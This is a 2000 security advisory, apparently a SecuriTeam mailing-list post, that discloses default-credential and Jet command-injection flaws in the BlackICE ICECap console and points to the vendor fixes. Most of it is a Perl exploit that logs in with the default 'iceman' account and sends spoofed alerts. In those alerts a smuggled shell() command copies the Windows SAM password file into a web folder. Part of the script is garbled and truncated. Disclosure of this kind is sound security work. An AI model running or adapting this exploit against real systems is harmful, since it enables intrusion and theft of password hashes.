Subject: [EXPL] Mining BlackICE with RFPickAxe Date: Thu, 18 May 2000 07:30:17 +0200 The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com Mining BlackICE with RFPickAxe -------------------------------------------------------------------------------- SUMMARY The BlackICE IDS uses a management console called ICECap to collect and monitor alerts sent by the various installed BlackICE agents. The ICECap user console listens on port 8081 (with an included HTTP server), and alerts are pushed to another server listening on port 8082. The first problem is that the software uses a default login of 'iceman', with no password. This means we can log onto the console on port 8081, or push it alerts on port 8082. The second problem is that the software uses, by default, the Microsoft Jet 3.5 engine to store alerts. If you couple that with the VBA shell problem, you can push alerts that contain commands, and those will be executed by the ICECap system. DETAILS Exploit: #!/usr/bin/perl # # RFPickaxe.pl - demo exploit for default ICECap login/alerts # Disclaimer: I do not provide technical support for my exploits! # # Sorry, this requires Unix, due to the `date` call $|=1; use Socket; ############################################################### # IP of ICECap system (assumes port 8082) $Target="10.10.200.4"; # account info - uses default 'iceman' w/ no password $account="iceman"; $httpauth="aWNlbWFuOiUzQjclQzYlRkU="; #-------- attributes of the alert ---------- $id="100005"; $issue_name="Exploit"; $sev="1"; # spoof these $target="0.0.0.8"; $target_dns="some.host.com"; $det_ip="0.0.0.8"; $det_nbn="SENSOR"; $int_ip="255.255.255.255"; $param="Pickaxe"; # either fake the MAC, or use it to run commands via JET vulnerability #$det_mac="0000000000000"; $det_mac="|shell(\"cmd /c copy c:\\winnt\\repair\\sam._ ". "c:\\progra~1\\networ~1\\icecap\\spatch\\en\\sam.exe \")|"; ############################################################## $inet=inet_aton($Target); $time=`date -u "+%Y-%m-%d %T"`; $time=~s/ /%20/g; $time=~s/:/%3a/g; #path is \program files\network ice\icecap\spatch\en $alert="accountName=$account&issueID=$id&issueName=$issue_name". "&severity=$sev&targetNetAddress=$target&targetDNSName=". "$target_dns&detectorNetAddress=$det_ip&detectorNetBIOS". "Name=$det_nbn&detectorMacAddress=$det_mac&". "intruderNetAddress=$int_ip&detectorType=3&startTime=". "$time¶meter=$param\r\n"; $len=length($alert); @DXX=(); $send=<; select(STDOUT); close(S); alarm(0); return; } else { die("not responding"); } alarm(0);}; if ($@) { if ($@ =~ /timeout/){ die("Timed out!\n");}}} Solution: NetworkICE has released ICEcap v2.0.23a, as well as some supporting KB articles detailing the problem. ICEcap 2.0.23a: http://advice.networkice.com/advice/Support/KB/q000167/ Jet bug: http://advice.networkice.com/advice/Support/KB/q000164/ Easy injection bug: http://advice.networkice.com/advice/Support/KB/q000166/ ADDITIONAL INFORMATION The information has been provided by: rain forest puppy. ======================================== DISCLAIMER: The information in this bulletin is provided "AS IS" without warranty of any kind. In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.